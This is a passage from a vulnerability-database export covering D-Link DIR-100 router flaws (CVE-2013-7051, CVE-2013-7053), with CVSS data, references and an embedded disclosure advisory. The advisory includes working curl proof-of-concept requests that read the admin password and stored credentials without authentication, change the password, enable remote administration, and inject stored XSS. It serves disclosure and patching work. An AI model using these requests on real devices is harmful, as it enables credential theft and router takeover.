(XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7051"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7051",
"trust": 3.4
},
{
"db": "BID",
"id": "65290",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "31425",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01475",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"id": "VAR-202002-0666",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
}
]
},
"last_update_date": "2024-11-23T21:36:11.432000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "D-Link DIR-100 verifies patches that bypass privileged command execution vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44074"
},
{
"title": "D-Link DIR-100 Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109810"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Incorrect authentication (CWE-287) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.6,
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"trust": 1.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"trust": 1.6,
"url": "https://www.securityfocus.com/bid/65290"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.8,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"date": "2020-02-04T14:15:11.323000",
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"date": "2022-07-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"date": "2024-11-21T02:00:14.493000",
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-100\u00a0 Vulnerabilities in authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
}
],
"trust": 0.6
}
}
var-202002-0668
Vulnerability from variot
D-Link DIR-100 Contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context, such as changing administrator passwords. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0668",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 0.4
},
"cve": "CVE-2013-7053",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2013-7053",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01477",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2013-7053",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-7053",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7053",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-7053",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-01477",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-036",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 Contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context, such as changing administrator passwords. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl 